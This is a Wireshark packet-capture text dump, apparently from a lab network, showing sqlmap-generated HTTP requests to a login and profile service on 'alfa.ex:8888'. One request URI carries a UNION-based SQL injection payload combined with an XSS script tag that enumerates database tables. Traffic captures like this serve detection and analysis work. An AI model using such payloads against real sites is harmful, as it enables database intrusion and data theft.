     […]Cookie: sweet=.eJwljjuOAjEQBa8y2zGB7W577DnF5iuEuu1nQGI_GjMR4u4M2qheBU-qB536TccFg5avB033HfSNMfQMOtDnDTowjev5Z9r-JkP_XfFBx-fxsB9XjAst93XDbtdGC2ntMhe21FmFk3EEs4QczSRxit6VJqXBISFWDl4YLlvITaNTlWbZO3XGraiHOUaduQV43XcsZpxrgYgvHF1Xl1PvTbhJLb
        Cookie pair […]: sweet=.eJwljjuOAjEQBa8y2zGB7W577DnF5iuEuu1nQGI_GjMR4u4M2qheBU-qB536TccFg5avB033HfSNMfQMOtDnDTowjev5Z9r-JkP_XfFBx-fxsB9XjAst93XDbtdGC2ntMhe21FmFk3EEs4QczSRxit6VJqXBISFWDl4YLlvITaNTlWbZO3XGraiHOUaduQV43XcsZpxrgYgvHF1Xl1PvT
    Host: alfa.ex:8888\r\n
    Accept: */*\r\n
    Accept-Encoding: gzip,deflate\r\n
    Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n
    Connection: close\r\n
    \r\n
    [Full request URI […]: http://alfa.ex:8888/login?vWKJ=2488%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%]
    File Data: 32 bytes
HTML Form URL Encoded: application/x-www-form-urlencoded
    Form item: "email" = "username"
        Key: email
        Value: username
    Form item: "password" = "password"
        Key: password
        Value: password

Frame 132310: 98 bytes on wire (784 bits), 98 bytes captured (784 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr 14, 2025 16:04:11.946979000 CEST
    UTC Arrival Time: Apr 14, 2025 14:04:11.946979000 UTC
    Epoch Arrival Time: 1744639451.946979000
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 0.000027000 seconds]
    [Time delta from previous displayed frame: 0.653653000 seconds]
    [Time since reference or first frame: 130.972938000 seconds]
    Frame Number: 132310
    Frame Length: 98 bytes (784 bits)
    Capture Length: 98 bytes (784 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
Ethernet II, Src: 02:42:0a:14:00:08 (02:42:0a:14:00:08), Dst: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
    Destination: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 02:42:0a:14:00:08 (02:42:0a:14:00:08)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
    [Stream index: 2]
Internet Protocol Version 4, Src: 10.20.0.8, Dst: 10.20.2.45
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 84
    Identification: 0x634f (25423)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0xc0f8 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 10.20.0.8
    Destination Address: 10.20.2.45
    [Stream index: 1]
Transmission Control Protocol, Src Port: 49354, Dst Port: 8888, Seq: 583, Ack: 1, Len: 32
    Source Port: 49354
    Destination Port: 8888
    [Stream index: 65544]
    [Stream Packet Number: 6]
    [Conversation completeness: Incomplete, DATA (15)]
        ..0. .... = RST: Absent
        ...0 .... = FIN: Absent
        .... 1... = Data: Present
        .... .1.. = ACK: Present
        .... ..1. = SYN-ACK: Present
        .... ...1 = SYN: Present
        [Completeness Flags: ··DASS]
    [TCP Segment Len: 32]
    Sequence Number: 583    (relative sequence number)
    Sequence Number (raw): 605998789
    [Next Sequence Number: 615    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 599117574
    1000 .... = Header Length: 32 bytes (8)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window: 502
    [Calculated window size: 64256]
    [Window size scaling factor: 128]
    Checksum: 0x16a3 [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Timestamps: TSval 569052861, TSecr 2922832007
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 569052861
            Timestamp echo reply: 2922832007
    [Timestamps]
        [Time since first frame in this TCP stream: 0.646671000 seconds]
        [Time since previous frame in this TCP stream: 0.000027000 seconds]
    [SEQ/ACK analysis]
        [iRTT: 0.000025000 seconds]
        [Bytes in flight: 32]
        [Bytes sent since last PSH flag: 32]
    TCP payload (32 bytes)
    TCP segment data (32 bytes)
[2 Reassembled TCP Segments (614 bytes): #132308(582), #132310(32)]
    [Frame: 132308, payload: 0-581 (582 bytes)]
    [Frame: 132310, payload: 582-613 (32 bytes)]
    [Segment count: 2]
    [Reassembled TCP length: 614]
    [Reassembled TCP Data […]: 504f5354202f70726f66696c6520485454502f312e310d0a436f6e74656e742d4c656e6774683a2033320d0a43616368652d436f6e74726f6c3a206e6f2d63616368650d0a557365722d4167656e743a2073716c6d61702f312e382e3923737461626c6520286874747]
Hypertext Transfer Protocol
    POST /profile HTTP/1.1\r\n
        Request Method: POST
        Request URI: /profile
        Request Version: HTTP/1.1
    Content-Length: 32\r\n
        [Content length: 32]
    Cache-Control: no-cache\r\n
    User-Agent: sqlmap/1.8.9#stable (https://sqlmap.org)\r\n
     […]Cookie: sweet=.eJwljjuOAjEQBa8y2zGB7W577DnF5iuEuu1nQGI_GjMR4u4M2qheBU-qB536TccFg5avB033HfSNMfQMOtDnDTowjev5Z9r-JkP_XfFBx-fxsB9XjAst93XDbtdGC2ntMhe21FmFk3EEs4QczSRxit6VJqXBISFWDl4YLlvITaNTlWbZO3XGraiHOUaduQV43XcsZpxrgYgvHF1Xl1PvTbhJLb
        Cookie pair […]: sweet=.eJwljjuOAjEQBa8y2zGB7W577DnF5iuEuu1nQGI_GjMR4u4M2qheBU-qB536TccFg5avB033HfSNMfQMOtDnDTowjev5Z9r-JkP_XfFBx-fxsB9XjAst93XDbtdGC2ntMhe21FmFk3EEs4QczSRxit6VJqXBISFWDl4YLlvITaNTlWbZO3XGraiHOUaduQV43XcsZpxrgYgvHF1Xl1PvT
        Cookie pair: HttpOnly
        Cookie pair: Path=/
    Host: alfa.ex:8888\r\n
    Accept: */*\r\n
    Accept-Encoding: gzip,deflate\r\n
    Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n
    Connection: close\r\n
    \r\n
    [Full request URI: http://alfa.ex:8888/profile]
    File Data: 32 bytes
HTML Form URL Encoded: application/x-www-form-urlencoded
    Form item: "email" = "username"
        Key: email
        Value: username
    Form item: "password" = "password"
        Key: password
        Value: password

Frame 132324: 98 bytes on wire (784 bits), 98 bytes captured (784 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr 14, 2025 16:04:11.956949000 CEST
    UTC Arrival Time: Apr 14, 2025 14:04:11.956949000 UTC
    Epoch Arrival Time: 1744639451.956949000
    [Time shift for this packet: 0.000000000 seconds]
    [Time delta from previous captured frame: 0.000025000 seconds]
    [Time delta from previous displayed frame: 0.009970000 seconds]
    [Time since reference or first frame: 130.982908000 seconds]
    Frame Number: 132324
    Frame Length: 98 bytes (784 bits)
    Capture Length: 98 bytes (784 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
Ethernet II, Src: 02:42:0a:14:00:08 (02:42:0a:14:00:08), Dst: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
    Destination: 02:42:0a:14:02:2d (02:42:0a:14:02:2d)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 02:42:0a:14:00:08 (02:42:0a:14:00:08)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
    [Stream index: 2]
Internet Protocol Version 4, Src: 10.20.0.8, Dst: 10.20.2.45
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 84
    Identification: 0xff79 (65401)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
